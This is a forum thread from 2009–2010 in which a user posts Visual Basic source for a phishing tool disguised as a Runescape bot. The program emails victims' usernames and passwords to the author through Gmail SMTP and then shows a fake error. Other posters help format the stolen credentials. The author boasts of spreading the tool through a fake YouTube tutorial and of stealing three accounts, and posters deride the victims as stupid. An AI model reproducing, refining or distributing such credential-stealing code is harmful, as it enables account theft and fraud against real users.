Need some help in VB

Need some help in VB

Rockbomb
Dog fucker (but in a good way now)

2009 Nov 13 • 2045
So I wrote a phishing program, disguised as a Runescape bot (No, I don't play RS).
But basically I set it up and everything works great. They input their user/pass, then select what skill they want to train, and when they click start it sends em the user pass as well as displays them with a phony error box. The only thing, is when I get the email, everything is all jammed together, so I want to put the user/pass on separate lines.
Here's what I've got at the moment...
code
Imports System.Net.Mail Public Class Form1 Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress("XXXXXXX@gmail.com") MyMailMessage.To.Add("XXXXXXX@gmail.com") MyMailMessage.Subject = ("free account") MyMailMessage.Body = TextBox1.Text + "-" + TextBox2.Text Dim SMTPServer As New SmtpClient("smtp.gmail.com") SMTPServer.Port = 587 SMTPServer.Credentials = New System.Net.NetworkCredential("XXXXXXXX@gmail.com", "XXXXXXXXX") SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) MsgBox("This version of RSProBot is not compatible with the current Runescape Client. Please contact our support team at: Support@ProBot.net", MsgBoxStyle.Information, "Compatability Error") End Sub Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click End End Sub End Class

Which yields "User-Pass" in the email.
I've tried doing something like
code
MyMailMessage.Body = TextBox1.Text + (SendKeys.Send("{~}")) + TextBox2.Text

But I keep getting errors.

Any ideas?
 
 
 
2009 Dec 23 at 16:01 PST
sprinkles

Chrome Whore
2009 Sep 6 • 2547
10 ₧
You could do this
code
jjy=textbox.text + " ---- " + this.text


Couldn't you also do
WriteLine
WriteLine

???
 
 
 
2009 Dec 23 at 16:03 PST — Ed. 2009 Dec 23 at 16:09 PST
Rockbomb
Dog fucker (but in a good way now)

2009 Nov 13 • 2045
sprinkles said:
You could do this
code
jjy=textbox.text + " ---- " + this.text



???


That would make it "User ---- Pass" in the email.
Which in all reality, would be fine. But I've been trying to get it to go to a different line for like the past 45 minutes and its turning out to be a decent challenge, so I'm curious to see how it could be done.
 
 
 
2009 Dec 23 at 16:14 PST
sprinkles

Chrome Whore
2009 Sep 6 • 2547
10 ₧
textBox1.Text = "Hi " + Environment.NewLine + "There"
code
textBox1.Text = "Hi" + chLF.ToString() + chCR.ToString() + "there"
code
textBox1.Text = "Hi\n\rThere"
code
The Visual Studio editor interprets the following characters as line breaks:

CRLF: Carriage return + line feed, Unicode characters 000D + 000A
LF: Line feed, Unicode character 000A
NEL: Next line, Unicode character 0085
LS: Line separator, Unicode character 2028
PS: Paragraph separator, Unicode character 2029
code
FileContents = FileContents + The Line Break Character + NewData
code
String = "Hello this is one line of text" & vbCrLf & "And this is on another."
code
code
code
code
code
code
The Environment.NewLine seems pretty popular.
 
 
 
2009 Dec 23 at 16:21 PST — Ed. 2009 Dec 23 at 16:23 PST
Rockbomb
Dog fucker (but in a good way now)

2009 Nov 13 • 2045
Nice, this worked...
code
MyMailMessage.Body = TextBox1.Text + Environment.NewLine + TextBox2.Text


Thanks
 
 
 
2009 Dec 23 at 16:29 PST
SRAW
Rocket Man

2007 Nov 6 • 2525
601 ₧
lol, but how do you expect to... spread it to other people... and wont they get a bit suspicious when their antivirus detects it as some lame vb virus
edit: isnt runescape also an online game without any client lol
Free Steam Games
 
 
 
2009 Dec 23 at 22:38 PST — Ed. 2009 Dec 23 at 22:39 PST
Rockbomb
Dog fucker (but in a good way now)

2009 Nov 13 • 2045
SRAW said:
lol, but how do you expect to... spread it to other people... and wont they get a bit suspicious when their antivirus detects it as some lame vb virus
edit: isnt runescape also an online game without any client lol



Well like I said, I don't play Runescape, so there's really no need for me to spread it. I was just bored and decided to make it.
Although, just for kicks, I made a "tutorial" on how to use it and put it on Youtube :P
http://www.youtube.com/watch?v=iludfkAI2PQ


Roflmfao, some idiot actually downloaded it. If anyone wants an account with level 3 fishing let me know xD
 
 
 
2009 Dec 24 at 06:37 PST — Ed. 2009 Dec 24 at 07:58 PST
Down Rodeo
Cap'n Moth of the Firehouse

Find the Hole II Participation Medal
2007 Oct 19 • 5486
57,583 ₧
Rockbomb said:
Roflmfao, some idiot actually downloaded it.

This is the internet. People are retarded on the internet. I had been going to say that you wouldn't need to try to spread it, it would just happen. And it does. Because people, particularly people on YouTube, are trusting and stupid.
 
 
 
2009 Dec 26 at 06:09 PST
Rockbomb
Dog fucker (but in a good way now)

2009 Nov 13 • 2045
Down Rodeo said:
Rockbomb said:
Roflmfao, some idiot actually downloaded it.

This is the internet. People are retarded on the internet. I had been going to say that you wouldn't need to try to spread it, it would just happen. And it does. Because people, particularly people on YouTube, are trusting and stupid.


Lol, yeah people really are stupid. I've now gotten 3 accounts without doing any advertising or anything for my video
 
 
 
2009 Dec 26 at 07:22 PST
sprinkles

Chrome Whore
2009 Sep 6 • 2547
10 ₧
If you don't mind could you upload the Source Code, I would like to take a look at it.
 
 
 
2010 Jan 4 at 12:40 PST
Rockbomb
Dog fucker (but in a good way now)

2009 Nov 13 • 2045
sprinkles said:
If you don't mind could you upload the Source Code, I would like to take a look at it.

Ummm, its in the first post...
 
 
 
2010 Jan 4 at 13:58 PST
SRAW
Rocket Man

2007 Nov 6 • 2525
601 ₧
Rockbomb said:
sprinkles said:
If you don't mind could you upload the Source Code, I would like to take a look at it.

Ummm, its in the first post...


the first post was only the email thing, he wants the whole gui thing i guess
Free Steam Games
 
 
 
2010 Jan 6 at 03:19 PST
Rockbomb
Dog fucker (but in a good way now)

2009 Nov 13 • 2045
Well I guess if you wanna look at the gui, you can download the whole program from the youtube link I posted ;)
 
 
 
2010 Jan 6 at 08:20 PST
sprinkles

Chrome Whore
2009 Sep 6 • 2547
10 ₧
Oh I thought it was more than that. Ok.
 
 
 
2010 Jan 6 at 21:36 PST
Page [1]